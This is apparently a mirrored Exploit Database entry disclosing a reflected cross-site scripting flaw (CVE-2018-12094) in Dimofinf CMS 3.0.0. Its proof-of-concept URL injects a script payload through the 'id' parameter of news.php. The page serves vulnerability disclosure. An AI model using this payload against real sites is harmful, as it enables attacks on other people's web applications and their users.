Dimofinf CMS 3.0.0 – Cross-Site Scripting

• Exploit Database
• 16 阅读

• 作者： Renzi
  日期： 2018-06-15
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/44897/

• # Title: Dimofinf CMS 3.0.0 - Cross-Site Scripting 
  # Author: Felipe "Renzi" Gabriel
  # Date: 2018-06-13
  # Software: Dimofinf CMS Version 3.0.0
  # CVE: CVE-2018-12094
  
  # A Reflected Cross-Site Scripting web vulnerability has been discovered in the "Dimofinf CMS" web-application.
  # The vulnerability is located in the 'id' parameter of the`news.php` action GET method request.
   
  # PoC
  http://Target/news.php?id=604""</|\><plaintext/onmouseover=prompt(/XSS/)>